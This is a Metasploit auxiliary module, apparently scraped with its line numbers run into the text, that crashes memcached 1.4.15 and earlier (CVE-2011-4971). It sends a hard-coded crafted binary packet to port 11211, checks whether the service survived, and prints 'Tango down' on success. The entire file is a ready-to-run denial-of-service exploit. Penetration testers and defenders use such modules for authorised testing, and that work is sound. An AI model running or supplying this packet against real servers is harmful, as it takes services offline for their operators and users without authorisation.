Path: blob/master/modules/auxiliary/dos/misc/memcached.rb
19715 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::Tcp7include Msf::Auxiliary::Dos89def initialize(info = {})10super(11update_info(12info,13'Name' => 'Memcached Remote Denial of Service',14'Description' => %q{15This module sends a specially-crafted packet to cause a16segmentation fault in memcached v1.4.15 or earlier versions.17},18'References' => [19[ 'URL', 'https://code.google.com/archive/p/memcached/issues/192' ],20[ 'CVE', '2011-4971' ],21[ 'OSVDB', '92867' ]22],23'Author' => [ 'Gregory Man <man.gregory[at]gmail.com>' ],24'License' => MSF_LICENSE,25'Notes' => {26'Stability' => [CRASH_SERVICE_DOWN],27'SideEffects' => [],28'Reliability' => []29}30)31)3233register_options([Opt::RPORT(11211),])34end3536def is_alive?37connect38disconnect39true40rescue Rex::ConnectionRefused41return false42end4344def run45connect46pkt = "\x80\x12\x00\x01\x08\x00\x00\x00\xff\xff\xff\xe8\x00\x00\x00\x00"47pkt << "\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x01\x00\x00\x00"48pkt << "\x00\x00\x00\x00\x00\x000\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"49pkt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"5051print_status("#{rhost}:#{rport} - Sending dos packet...")52sock.put(pkt)53disconnect5455print_status("#{rhost}:#{rport} - Checking host status...")56select(nil, nil, nil, 1)5758if is_alive?59print_error("#{rhost}:#{rport} - The DoS attempt did not work, host is still alive")60else61print_good("#{rhost}:#{rport} - Tango down") # WWJS - What would th3j35t3r say?62end63end64end656667